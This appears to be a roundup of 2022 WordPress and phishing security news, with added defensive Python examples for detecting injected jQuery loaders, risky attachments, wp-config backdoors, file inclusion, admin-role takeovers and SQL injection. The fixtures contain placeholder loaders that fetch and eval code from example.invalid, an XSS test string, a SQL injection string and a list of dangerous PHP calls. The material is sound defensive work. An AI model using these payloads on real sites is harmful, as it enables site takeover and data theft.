Massive WordPress JavaScript Injection Campaign Redirects to Ads 

Sucuri’s remediation and research teams regularly find malicious redirects on client sites. These infections automatically redirect site visitors to third-party websites with malicious resources, scam pages, or commercial websites with the intention of generating illegitimate traffic.

As outlined in Sucuri’s latest hacked website report, they’ve been tracking a long-lasting campaign responsible for injecting malicious scripts into compromised WordPress websites. This campaign leverages known vulnerabilities in WordPress themes and plugins and has impacted an enormous number of websites over the year — for example, according to PublicWWW (May 2022), the April wave for this campaign was responsible for over 9,300 infected websites alone.

Since these PublicWWW results only show detections for simple script injections, we can assume that the scope is significantly larger.

Investigating Obfuscated JavaScript in WordPress Sites

We recently investigated a number of WordPress websites complaining about unwanted redirects. Interestingly enough, they were found to be related to a new wave of this massive campaign and were sending website visitors through a series of website redirects to serve them unwanted ads.

The websites all shared a common issue — malicious JavaScript had been injected into their files and their database, including legitimate core WordPress files such as:

  • ./wp-includes/js/jquery/jquery.min.js
  • ./wp-includes/js/jquery/jquery-migrate.min.js

Once a website had been compromised, the attackers attempted to automatically infect every .js file with “jquery” in its name. The injected code begins with “/* trackmyposs*/eval(String.fromCharCode…”: the real payload is stored as a list of character codes that String.fromCharCode() reassembles and eval() runs in the visitor’s browser, which keeps the readable script out of simple signature scans.
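The following is an added example (not Sucuri’s tooling and not code from the campaign): a small static triage script that looks for the “/* trackmyposs*/” marker and the eval(String.fromCharCode(…)) wrapper in JavaScript text and decodes the character-code list with plain chr(), so an analyst can read what the eval() would have executed without running it. The file contents, paths and the decoded placeholder payload are all constructed for the demo.

```python
"""Static triage of the jQuery injection described above.

Added example (not Sucuri's tooling): finds the '/* trackmyposs*/' marker
and the eval(String.fromCharCode(...)) wrapper in JavaScript text, then
decodes the character-code list with plain chr() so the hidden payload can
be read without ever executing it. All file contents below are constructed
for the demo; the decoded 'payload' is a harmless placeholder.
"""
import re

MARKER = "/* trackmyposs*/"

# eval(String.fromCharCode(104,116,...)) -> capture the comma-separated codes
FROMCHARCODE_RE = re.compile(
    r"eval\(\s*String\.fromCharCode\(\s*([\d\s,]+?)\s*\)\s*\)", re.S
)


def decode_fromcharcode(codes: str) -> str:
    """Turn '104, 105' into 'hi'. Pure chr(), no JavaScript evaluation."""
    return "".join(chr(int(c)) for c in codes.split(",") if c.strip())


def find_injections(js_text: str) -> list:
    """Return (offset, decoded_payload) for every eval(String.fromCharCode()) hit."""
    return [(m.start(), decode_fromcharcode(m.group(1)))
            for m in FROMCHARCODE_RE.finditer(js_text)]


def is_suspicious(js_text: str) -> bool:
    """The campaign marker or the eval-of-charcodes wrapper is enough to flag a file."""
    return MARKER in js_text or FROMCHARCODE_RE.search(js_text) is not None


def triage(files: dict) -> dict:
    """Map path -> list of decoded payloads for every file judged suspicious.

    Files whose name contains 'jquery' are the campaign's preferred targets,
    but the check runs on every file so injections elsewhere are not missed.
    """
    return {path: [payload for _, payload in find_injections(text)]
            for path, text in files.items() if is_suspicious(text)}


def _encode_fromcharcode(s: str) -> str:
    """Only used to build the constructed sample below (mirrors the obfuscation)."""
    return ",".join(str(ord(ch)) for ch in s)


# Constructed samples: a clean minified jQuery stub and an infected copy.
CLEAN_JS = "/*! jQuery Migrate v3.3.2 (constructed stub) */\n(function(jQuery){})(jQuery);\n"
PLACEHOLDER_PAYLOAD = (
    "var s=document.createElement('script');"
    "s.src='https://example.invalid/redirect.js';document.head.appendChild(s);"
)
INFECTED_JS = (
    MARKER + "eval(String.fromCharCode(" + _encode_fromcharcode(PLACEHOLDER_PAYLOAD) + "));\n"
    + CLEAN_JS
)
SAMPLE_FILES = {
    "wp-includes/js/jquery/jquery.min.js": CLEAN_JS,
    "wp-includes/js/jquery/jquery-migrate.min.js": INFECTED_JS,
    "wp-content/themes/example-theme/main.js": INFECTED_JS,
}


if __name__ == "__main__":
    for path, payloads in triage(SAMPLE_FILES).items():
        print(path)
        for p in payloads:
            print("   decoded:", p)
```

Decoding rather than executing is the point: the decoded string tells you which domain the injected loader fetches from, which is what you need for blocklists and for checking the database (wp_posts, wp_options) for the same injection.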

Continue reading: https://blog.sucuri.net/2022/05/massive-wordpress-javascript-injection-campaign-redirects-to-ads.html

Cybercriminals are using SEO to improve the ranking of malicious PDFs on search results

In brief: Netskope’s new security report shows that there’s been a fivefold yearly increase in malicious PDF phishing downloads, with a lot of victims getting referred from search engines. Meanwhile, downloads of Microsoft Office files containing malware have returned to pre-Emotet levels.

Netskope, a security service edge provider, just published their new Cloud and Threat Report, which examines the past 12 months of malware downloads from the cloud and web.

Research shows that there’s been a 450 percent yearly increase in malicious PDF phishing downloads, with attackers using search engine optimization (SEO) techniques to improve the ranking of malicious PDF files on search engines such as Google and Bing.

These files often take the form of fake file sharing requests, fake invoices, or even fake Captchas that redirect users to phishing, spam, scam, and malware websites.

According to the report, most malware is being downloaded from within the same region as its victim in order to avoid geofencing filters. Over 80 percent of all malware downloads by victims in North America were downloaded from websites hosted there.

There are several other noteworthy findings in the report. Trojans continue to be effective, with 77 percent of malware downloads being Trojans. There is no single Trojan family that is globally dominant, with the top 10 families accounting for only 13 percent of all downloads.

Cybercriminals use a combination of web and cloud to target their victims, as 53 percent of malware downloads originate from traditional websites and the rest from cloud apps used for collaboration and webmail. Here, attackers can send messages to their victims through emails, direct messages, comments, and document shares.

Source: https://www.techspot.com/news/94547-cybercriminals-using-seo-improve-ranking-malicious-pdfs-search.html

Dangerous new one-click Gmail hack puts your private data at risk

If you need any more reasons to be particularly careful when opening an email attachment, here’s one for you. A new Gmail hack campaign is currently making the rounds, and a single click could be enough to infect your computer and put your data at risk.

Last week, Trustwave senior security researcher Diana Lopera published a blog post about a frightening new email hack campaign. According to Lopera, scammers are sneakily attaching malicious files to emails using file formats that would not normally raise suspicion. They are using this technique to spread the data-stealing Vidar malware.

The emails are short and direct the reader’s attention to the attachment. The attachment in question is often named “request.doc,” but it is really an ISO file. As Lopera explains, ISO is a disk image file format cybercriminals occasionally use to store malware. It might look like a text document, but the ISO actually contains two files. One is a Microsoft Compiled HTML Help (CHM) file named “pss10r.chm” and the other is an executable named “app.exe.”
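As an added example (not Trustwave’s tooling, and containing no real malware), here is how a mail gateway or responder can catch this lure by checking file signatures instead of trusting the name: a “.doc” whose bytes say ISO 9660 is a mismatch, and ISO, CHM and EXE are flagged as dangerous regardless of name. The sample bytes are constructed minimal headers.

```python
"""Attachment triage by file signature rather than file name.

Added example, not Trustwave's tooling. 'request.doc' in the lure is really an
ISO image, and the ISO carries a CHM and an EXE. Checking magic bytes catches
both the name/content mismatch and the inherently risky container types. All
sample bytes are constructed minimal headers, not real malware.
"""

# (signature bytes, offset in file, type name)
SIGNATURES = [
    (b"CD001", 0x8001, "iso"),   # ISO 9660: volume descriptor after a 32 KiB system area
    (b"ITSF", 0, "chm"),         # Microsoft Compiled HTML Help
    (b"MZ", 0, "exe"),           # DOS/PE executable
    (b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1", 0, "doc"),  # OLE2 compound file (legacy Office)
    (b"PK\x03\x04", 0, "docx"),  # ZIP container (OOXML, also .xlsx/.pptx)
]

# Detected types that are acceptable for a claimed extension
EXPECTED = {"doc": {"doc"}, "docx": {"docx"}, "xlsx": {"docx"}, "iso": {"iso"},
            "exe": {"exe"}, "chm": {"chm"}}

# Container/executable types that should not arrive by e-mail at all
DANGEROUS_TYPES = {"iso", "chm", "exe"}


def detect_type(data: bytes) -> str:
    for sig, off, name in SIGNATURES:
        if data[off:off + len(sig)] == sig:
            return name
    return "unknown"


def extension_of(filename: str) -> str:
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def triage_attachment(filename: str, data: bytes) -> dict:
    """Return detected type and a verdict: 'dangerous', 'mismatch' or 'ok'."""
    detected = detect_type(data)
    ext = extension_of(filename)
    if detected in DANGEROUS_TYPES:
        verdict = "dangerous"
    elif ext in EXPECTED and detected not in EXPECTED[ext]:
        verdict = "mismatch"     # name claims one format, bytes say another
    else:
        verdict = "ok"
    return {"filename": filename, "extension": ext, "detected": detected, "verdict": verdict}


def fake_iso() -> bytes:
    """Constructed: empty 32 KiB system area, then a primary volume descriptor header."""
    return b"\x00" * 0x8000 + b"\x01CD001\x01" + b"\x00" * 2041


# Constructed samples mirroring the names in the report
SAMPLES = {
    "request.doc": fake_iso(),
    "pss10r.chm": b"ITSF" + b"\x00" * 60,
    "app.exe": b"MZ" + b"\x00" * 62,
    "invoice.doc": b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1" + b"\x00" * 64,
    "notes.txt": b"plain text\n",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(triage_attachment(name, data))
```

The same check belongs inside the container too: once the ISO is opened, the CHM and EXE it carries would be caught by their own signatures.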

As you hopefully know by now, never ever open an email attachment from a source you don’t recognize. In fact, even if you do recognize the sender, double-check everything first. There are plenty of scams that involve using similar addresses to convince victims of their legitimacy.

More details: https://bgr.com/tech/dangerous-new-one-click-gmail-hack-puts-your-private-data-at-risk

Reflected XSS in Spam protection, AntiSpam, FireWall by CleanTalk

CleanTalk is a WordPress plugin designed to protect websites from spam comments and registrations. One of the features it includes is the ability to check comments for spam and present the spammy comments for deletion.

Thanks to a quirk of how WordPress processes the page parameter combined with PHP’s default request order (request_order = "GP", which fills $_REQUEST from $_GET and then $_POST, so a POST field overrides a GET parameter of the same name), it is possible to use this parameter to perform a reflected cross-site scripting attack, almost identical to a vulnerability recently covered by the folks at Wordfence.

The vulnerability can be used to execute JavaScript in the browser of a logged-in administrator, for instance, by tricking them into visiting a self-submitting form that sends a POST request to the site at wp-admin/edit-comments.php?page=ct_check_spam, with the $_POST[‘page’] parameter set to malicious JavaScript.

As with any Cross-Site Scripting vulnerability, executing JavaScript in an administrator’s session can be used to take over a site by adding a new malicious administrator or injecting a backdoor, among other potential methods.
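The Python model below is an added example, not the plugin’s code: it reproduces how PHP merges $_GET and $_POST into $_REQUEST under the default request order, so the URL can still say ?page=ct_check_spam while the value that gets echoed comes from the POST body, and it shows the unescaped rendering next to the attribute-escaped one. The payload is a generic test string, not the reported exploit.

```python
"""Model of the PHP request-order behaviour behind this reflected XSS.

Added example, not the plugin's code. PHP's default request_order = "GP"
builds $_REQUEST from $_GET and then $_POST, so a POST field overrides a GET
parameter of the same name. A page that is reached via ?page=ct_check_spam
in the URL but echoes the page value from the merged request without
escaping will therefore reflect whatever the POST body carried. The
handlers below are a Python sketch of that pattern; the payload is a
generic test string rather than the reported exploit.
"""
import html


def php_request(get: dict, post: dict, request_order: str = "GP") -> dict:
    """Merge superglobals the way PHP builds $_REQUEST: later letters win."""
    sources = {"G": get, "P": post}
    merged = {}
    for letter in request_order:
        merged.update(sources.get(letter, {}))
    return merged


def render_vulnerable(request: dict) -> str:
    """The flawed pattern: the value goes into HTML untouched."""
    return f'<input type="hidden" name="page" value="{request.get("page", "")}">'


def render_fixed(request: dict) -> str:
    """Escape for an attribute context (what esc_attr() does in WordPress)."""
    safe = html.escape(request.get("page", ""), quote=True)
    return f'<input type="hidden" name="page" value="{safe}">'


# What the admin's URL carries versus what a self-submitting form posts
GET_PARAMS = {"page": "ct_check_spam"}
POST_PARAMS = {"page": '"><script>alert(1)</script>'}


def demo() -> dict:
    req = php_request(GET_PARAMS, POST_PARAMS)
    return {
        "effective_page": req["page"],
        "vulnerable": render_vulnerable(req),
        "fixed": render_fixed(req),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Escaping on output fixes the reflection; reading the routing value from $_GET only (rather than $_REQUEST) removes the POST override as well, and a nonce check on the form stops the cross-site submission in the first place.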

A patched version was released on March 25th and installed on all our clients’ websites the same day.

Increase In Malware Sightings on GoDaddy Managed Hosting

On March 15, 2022, the Wordfence Incident Response team alerted the Wordfence Threat Intelligence team to an increase in infected websites hosted on GoDaddy’s Managed WordPress service, which includes MediaTemple, tsoHost, 123Reg, Domain Factory, Heart Internet, and Host Europe Managed WordPress sites. The affected sites have a nearly identical backdoor prepended to the wp-config.php file. Of the 298 sites newly infected by this backdoor since March 11, at least 281 are hosted with GoDaddy.

The backdoor in question has been in use since at least 2015. It generates spammy Google search results and includes resources customized to the infected site. The main backdoor is added to the very beginning of wp-config.php; the Wordfence post linked below reproduces it and shows that it downloads an encoded file.

The encoded file that is downloaded contains a template based on the infected site source code, but with links to pharmaceutical spam added. This spam link template is set to display whenever the site is accessed.

If your site is hosted on GoDaddy’s Managed WordPress platform (which includes MediaTemple, tsoHost, 123Reg, Domain Factory, Heart Internet, and Host Europe Managed WordPress sites), we strongly recommend that you manually check your site’s wp-config.php file, or run a scan with a malware detection solution such as the free Wordfence scanner to ensure that your site is not infected.

If your site is infected you will need to have it cleaned and may also need to remove spam search engine results. 
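For the manual check recommended above, here is an added example (not Wordfence’s scanner): a small allowlist linter for wp-config.php. A stock file contains only comments, define() calls, the $table_prefix line, the ABSPATH guard and the closing require_once, so anything else, or any use of eval()/base64_decode() and similar, is reported with its line number. Both file bodies are constructed; the “infected” one has two harmless placeholder lines where a prepended backdoor would sit.

```python
"""Allowlist check of wp-config.php for prepended or injected code.

Added example, not Wordfence's scanner. A stock wp-config.php is nothing but
comments, define() calls, the $table_prefix line, the ABSPATH guard and the
closing require_once. Every other line, and any use of eval()/base64_decode()
and friends, is reported with its line number. The two file bodies below are
constructed; the 'infected' one carries a harmless placeholder in the spot
where the real backdoor would sit.
"""
import re

ALLOWED_LINES = [
    re.compile(r"^<\?php\s*$"),
    re.compile(r"^\s*$"),                                   # blank
    re.compile(r"^\s*(/\*|\*|//|#)"),                       # comment lines
    re.compile(r"^\s*define\(\s*'[A-Z0-9_]+'\s*,"),          # define( 'DB_NAME', ... );
    re.compile(r"^\s*\$table_prefix\s*=\s*'[A-Za-z0-9_]+'\s*;"),
    re.compile(r"^\s*if\s*\(\s*!\s*defined\(\s*'ABSPATH'\s*\)\s*\)"),
    re.compile(r"^\s*\}\s*$"),
    re.compile(r"^\s*require_once\s*\(?\s*ABSPATH\s*\.\s*'wp-settings\.php'"),
]

# Functions that have no business in a configuration file (compared lower-case)
DANGEROUS_CALLS = [
    "eval(", "base64_decode(", "gzinflate(", "gzuncompress(", "str_rot13(",
    "create_function(", "curl_exec(", "assert(",
    "file_get_contents('http", 'file_get_contents("http',
]


def lint_wp_config(text: str) -> list:
    """Return (line_no, reason, stripped_line) for each suspicious line."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        lowered = line.lower()
        hit = next((fn for fn in DANGEROUS_CALLS if fn in lowered), None)
        if hit:
            findings.append((n, f"dangerous call {hit}", line.strip()))
        elif not any(p.match(line) for p in ALLOWED_LINES):
            findings.append((n, "not in wp-config allowlist", line.strip()))
    return findings


CLEAN_WP_CONFIG = """<?php
/**
 * The base configuration for WordPress (constructed sample)
 */
define( 'DB_NAME', 'wp' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'example-only' );
define( 'DB_HOST', 'localhost' );
define( 'WP_DEBUG', false );
$table_prefix = 'wp_';
if ( ! defined( 'ABSPATH' ) ) {
    define( 'ABSPATH', __DIR__ . '/' );
}
require_once ABSPATH . 'wp-settings.php';
"""

# Two placeholder lines prepended right after the opening tag, as the backdoor is
INFECTED_WP_CONFIG = CLEAN_WP_CONFIG.replace(
    "<?php\n",
    "<?php\n"
    "$x = @file_get_contents('https://example.invalid/t');\n"
    "eval(base64_decode($x));\n",
    1,
)


if __name__ == "__main__":
    for name, body in (("clean", CLEAN_WP_CONFIG), ("infected", INFECTED_WP_CONFIG)):
        print(name, lint_wp_config(body) or "no findings")
```

Sites that legitimately add ini_set() or other lines to wp-config.php will need those patterns added to the allowlist; a finding is a prompt for a human look, not a verdict.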

Source: https://www.wordfence.com/blog/2022/03/increase-in-malware-sightings-on-godaddy-managed-hosting

Beware: new IRS rules will lead to a wave of phishing frauds

Thanks to new legislation that went into place at the beginning of this year, I predict that a lot of unsuspecting small business owners are about to fall victim to a fresh scam.

The scam will relate to legislation around new tax reporting rules that will affect millions of freelancers and small businesses. As explained in an earlier column, beginning for the 2022 tax year, if you receive more than $600 in total payments during the course of the year from a payment service like PayPal, Venmo (which is owned by PayPal), Square, Stripe or online sales of your products made through Amazon, Etsy and other marketplaces – regardless of how many customers are paying – that payment service is required to report that amount to the IRS and to you by sending a Form 1099-K – used for reporting payments via these third parties – in early 2023.

Full story: https://www.theguardian.com/money/2022/feb/27/beware-phising-fraud-new-irs-rules-online-payment-service-receipts

Elementor WordPress plugin has a gaping security hole – update now

If you run a WordPress site and you use the Elementor website creation toolkit, you could be at risk of a security hole that combines data leakage and remote code execution.

That’s if you use a plugin called Essential Addons for Elementor, which is a popular tool for adding visual features such as timelines, image galleries, ecommerce forms and price lists.

An independent threat researcher called Wai Yan Myo Thet recently discovered what’s known as a file inclusion vulnerability in the product.

This security hole made it possible for attackers to trick the plugin into accessing and including a server-side file using a filename supplied in the incoming web request.

Simply put, a malicious visitor could trick an unpatched server into serving up a file it’s not supposed to, such as the server’s own username database, or coerce the server into running a script it shouldn’t, thus creating a remote code execution (RCE) hole.
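The plugin is PHP, but the two controls that close this class of hole are language-independent, so here is an added example (not the plugin’s code or its patch) in Python: an allowlist of template names the code actually ships, plus a realpath containment check so “../” or symlinks cannot leave the template directory. The directory layout, template and “secret” file are created in a temporary directory for the demo.

```python
"""Rejecting request-supplied file names before including them.

Added example, not the plugin's code. Essential Addons let a request choose
which server-side file was included; two controls close that class of hole:
an allowlist of template names the plugin actually ships, and a realpath
containment check so '../' or symlinks cannot leave the template directory.
The directory, template and 'secret' file are created in a temp dir for the demo.
"""
import os
import tempfile


def vulnerable_resolve(base_dir: str, requested: str) -> str:
    """The flawed pattern: build the include path straight from the request."""
    return os.path.realpath(os.path.join(base_dir, requested + ".php"))


def resolve_template(base_dir: str, requested: str, allowed: set) -> str:
    """Return the absolute path of an allowed template under base_dir, or raise ValueError."""
    if requested not in allowed:                       # 1. allowlist by name
        raise ValueError(f"template not allowed: {requested!r}")
    base = os.path.realpath(base_dir)                  # 2. containment after resolving '..'/symlinks
    candidate = os.path.realpath(os.path.join(base, requested + ".php"))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes template directory: {requested!r}")
    if not os.path.isfile(candidate):                  # 3. exists as a regular file
        raise ValueError(f"template missing: {requested!r}")
    return candidate


def demo() -> dict:
    """Exercise benign and hostile names against a throwaway layout."""
    with tempfile.TemporaryDirectory() as tmp:
        tpl = os.path.join(tmp, "templates")
        os.mkdir(tpl)
        with open(os.path.join(tpl, "gallery.php"), "w") as fh:
            fh.write("<?php /* constructed template */ ?>")
        with open(os.path.join(tmp, "secret.php"), "w") as fh:   # stands in for wp-config.php
            fh.write("<?php /* must never be includable */ ?>")

        allowed = {"gallery", "timeline"}
        results = {}
        for name in ("gallery", "timeline", "../secret", "/etc/passwd"):
            try:
                results[name] = ("ok", os.path.basename(resolve_template(tpl, name, allowed)))
            except ValueError as exc:
                results[name] = ("rejected", str(exc))
        # Even if an attacker got a traversal string onto the allowlist, containment still holds
        try:
            resolve_template(tpl, "../secret", {"../secret"})
            results["containment"] = "failed"
        except ValueError as exc:
            results["containment"] = str(exc)
        # The naive version resolves the traversal to the file outside the directory
        results["vulnerable"] = os.path.basename(vulnerable_resolve(tpl, "../secret"))
        return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "->", v)
```

Either control alone is weaker than both: an allowlist typo or a later feature that accepts free-form names is caught by containment, and containment alone still lets a request pick any file that happens to live under the template directory.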

As you probably know, web server RCE bugs are typically abused to implant malware that allows the attackers to do something to your immediate, and often costly, detriment.

Clients of ProtectYourWP.com have already been updated, of course.

Source and more details: https://nakedsecurity.sophos.com/2022/02/02/elementor-wordpress-plugin-has-a-gaping-security-hole-update-now/

See also: https://www.darkreading.com/vulnerabilities-threats/tens-of-thousands-of-websites-vulnerable-to-rce-flaw-in-wordpress-plugin

Massive attack against 1.6 million WordPress sites underway

Wordfence analysts report having detected a massive wave of attacks in the last couple of days, originating from 16,000 IPs and targeting over 1.6 million WordPress sites.

The threat actors target four WordPress plugins and fifteen Epsilon Framework themes, one of which has no available patch.

Some of the targeted plugins were patched all the way back in 2018, while others had their vulnerabilities addressed as recently as this week.

The affected plugins are:

  • PublishPress Capabilities
  • Kiwi Social Plugin
  • Pinterest Automatic
  • WordPress Automatic

The targeted Epsilon Framework themes are:

  • Shapely
  • NewsMag
  • Activello
  • Illdy
  • Allegiant
  • Newspaper X
  • Pixova Lite
  • Brilliance
  • MedZone Lite
  • Regina Lite
  • Transcend
  • Affluent
  • Bonkers
  • Antreas
  • NatureMag Lite – No patch available

“In most cases, the attackers are updating the users_can_register option to enabled and setting the default_role option to administrator,” Wordfence explains.

“This makes it possible for attackers to register on any site as an administrator effectively taking over the site.”
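Whether a site has already been hit by this option flip can be checked directly in the database. The script below is an added example (not Wordfence’s code): it queries wp_options for users_can_register and default_role, lists every account holding the administrator capability so a freshly registered admin stands out, and resets the two options. An in-memory SQLite copy with constructed rows stands in for the real MySQL database; point the connection at the live database and keep the table prefix from wp-config.php to run it for real.

```python
"""Detecting and undoing the users_can_register / default_role flip.

Added example, not Wordfence's code. Attackers set users_can_register=1 and
default_role=administrator so that anyone who signs up becomes an admin. The
checks below query a wp_options table (an in-memory SQLite copy with
constructed rows stands in for MySQL), list accounts holding the
administrator capability, and reset the two options. The prefix argument is
the site's table prefix from wp-config.php, not request input.
"""
import sqlite3


def check_registration_settings(conn, prefix: str = "wp_") -> list:
    """Return human-readable findings; an empty list means the two options are stock."""
    rows = conn.execute(
        f"SELECT option_name, option_value FROM {prefix}options "
        "WHERE option_name IN ('users_can_register', 'default_role')"
    ).fetchall()
    opts = dict(rows)
    findings = []
    if opts.get("users_can_register") == "1":
        findings.append("users_can_register=1: anyone can sign up")
    role = opts.get("default_role", "")
    if role == "administrator":
        findings.append("default_role=administrator: every signup becomes an admin")
    elif role != "subscriber":
        findings.append(f"default_role={role!r}: not the stock 'subscriber'")
    return findings


def list_administrators(conn, prefix: str = "wp_") -> list:
    """Logins whose serialised capabilities array contains 'administrator', oldest first."""
    rows = conn.execute(
        f"SELECT u.user_login FROM {prefix}users u "
        f"JOIN {prefix}usermeta m ON m.user_id = u.ID "
        f"WHERE m.meta_key = '{prefix}capabilities' "
        "AND m.meta_value LIKE '%\"administrator\"%' ORDER BY u.ID"
    ).fetchall()
    return [r[0] for r in rows]


def remediate(conn, prefix: str = "wp_") -> None:
    """Put the two options back to their stock values."""
    conn.execute(f"UPDATE {prefix}options SET option_value = '0' "
                 "WHERE option_name = 'users_can_register'")
    conn.execute(f"UPDATE {prefix}options SET option_value = 'subscriber' "
                 "WHERE option_name = 'default_role'")
    conn.commit()


def build_sample_db(users_can_register: str, default_role: str, extra_admin: str = None):
    """Constructed stand-in for a WordPress database with the three relevant tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, option_name TEXT,
                                 option_value TEXT, autoload TEXT);
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_registered TEXT);
        CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
                                  meta_key TEXT, meta_value TEXT);
    """)
    conn.executemany(
        "INSERT INTO wp_options (option_name, option_value, autoload) VALUES (?, ?, ?)",
        [("siteurl", "https://example.invalid", "yes"),
         ("users_can_register", users_can_register, "yes"),
         ("default_role", default_role, "yes")],
    )
    users = [(1, "admin", "2021-01-01 00:00:00", 'a:1:{s:13:"administrator";b:1;}'),
             (2, "writer", "2021-06-01 00:00:00", 'a:1:{s:6:"author";b:1;}')]
    if extra_admin:
        users.append((3, extra_admin, "2021-12-10 03:14:00", 'a:1:{s:13:"administrator";b:1;}'))
    for uid, login, registered, caps in users:
        conn.execute("INSERT INTO wp_users (ID, user_login, user_registered) VALUES (?, ?, ?)",
                     (uid, login, registered))
        conn.execute("INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)",
                     (uid, "wp_capabilities", caps))
    conn.commit()
    return conn


if __name__ == "__main__":
    db = build_sample_db("1", "administrator", extra_admin="new-signup")
    print(check_registration_settings(db))
    print("administrators:", list_administrators(db))
    remediate(db)
    print("after remediation:", check_registration_settings(db))
```

Resetting the options is not a clean-up on its own: any administrator account the attacker registered while the options were flipped stays in place until it is removed, and the vulnerable plugin or theme that allowed the option change still needs updating.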

Source: https://www.bleepingcomputer.com/news/security/massive-attack-against-16-million-wordpress-sites-underway/

WordPress Cache Plugin Exploit Affects +1 Million Websites

WP Fastest Cache WordPress plugin vulnerabilities can lead to full site takeover and password leaks

Jetpack security researchers discovered multiple vulnerabilities in the popular WP Fastest Cache WordPress plugin that could allow an attacker to gain full administrator privileges. The vulnerabilities affect over a million WordPress installations.

The authenticated SQL injection allows any logged-in user to read administrator-level information from the database.

A SQL injection vulnerability lets an attacker alter the queries a site sends to its database, which is where the site’s content and user records, including password hashes, are stored.

A successful SQL Injection attack could lead to a full website takeover.
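To make the mechanism concrete, here is an added example that is not the plugin’s code: a lookup that pastes a request value into its SQL string, beside the same lookup with the value bound as a parameter (which is what $wpdb->prepare() does in WordPress). On an in-memory SQLite stand-in the concatenated version hands back every user row, hashes included, for one crafted input; the bound version treats the same input as an ordinary, non-matching login. Table, rows and hash strings are constructed placeholders.

```python
"""SQL injection versus a parameterised query, on a SQLite stand-in.

Added example, not the plugin's code. The vulnerable function pastes a
request value straight into the SQL string; the fixed function binds it as a
parameter, which is what $wpdb->prepare() does in WordPress. Table, rows and
the '$P$B...' hash values are constructed placeholders.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT)")
    conn.executemany(
        "INSERT INTO wp_users (user_login, user_pass) VALUES (?, ?)",
        [("admin", "$P$BconstructedHash0000000000001"),
         ("editor", "$P$BconstructedHash0000000000002")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, login: str) -> list:
    """String concatenation: the input can close the quote and add its own logic."""
    sql = f"SELECT user_login, user_pass FROM wp_users WHERE user_login = '{login}'"
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, login: str) -> list:
    """Parameter binding: the input is only ever data, never SQL."""
    return conn.execute(
        "SELECT user_login, user_pass FROM wp_users WHERE user_login = ?", (login,)
    ).fetchall()


# A low-privileged user is only supposed to see their own row
INJECTION = "' OR '1'='1"


def demo() -> dict:
    conn = make_db()
    return {
        "vulnerable_rows": lookup_vulnerable(conn, INJECTION),
        "fixed_rows": lookup_fixed(conn, INJECTION),
        "fixed_legit": lookup_fixed(conn, "editor"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

“Authenticated” only lowers the bar slightly: on a site with open registration, or with any compromised low-privilege account, the attacker already has the logged-in session the exploit needs.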

More at original article: https://www.searchenginejournal.com/wp-fastest-cache-vulnerability/424278/amp/